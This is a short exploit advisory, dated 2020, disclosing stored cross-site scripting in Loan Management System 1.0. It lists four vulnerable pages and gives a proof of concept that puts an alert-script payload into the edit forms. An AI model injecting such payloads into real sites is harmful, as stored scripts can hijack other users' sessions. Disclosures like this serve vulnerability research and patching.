# Exploit Title: Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)# Google Dork: N/A# Date: 2020/10/19# Exploit Author: Akıner Kısa# Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system-using-php.zip# Version: 1.0# Tested on: XAMPP # CVE : N/A
Vulnerable Pages:
http://localhost/loan/index.php?page=loans
http://localhost/loan/index.php?page=payments
http://localhost/loan/index.php?page=borrowers
http://localhost/loan/index.php?page=loan_type
Proof of Concept:1- Go to vulnerable pages and using edit button (in the right, action column).2- And fill the blanks with"<script>alert(1)</script>" payload.
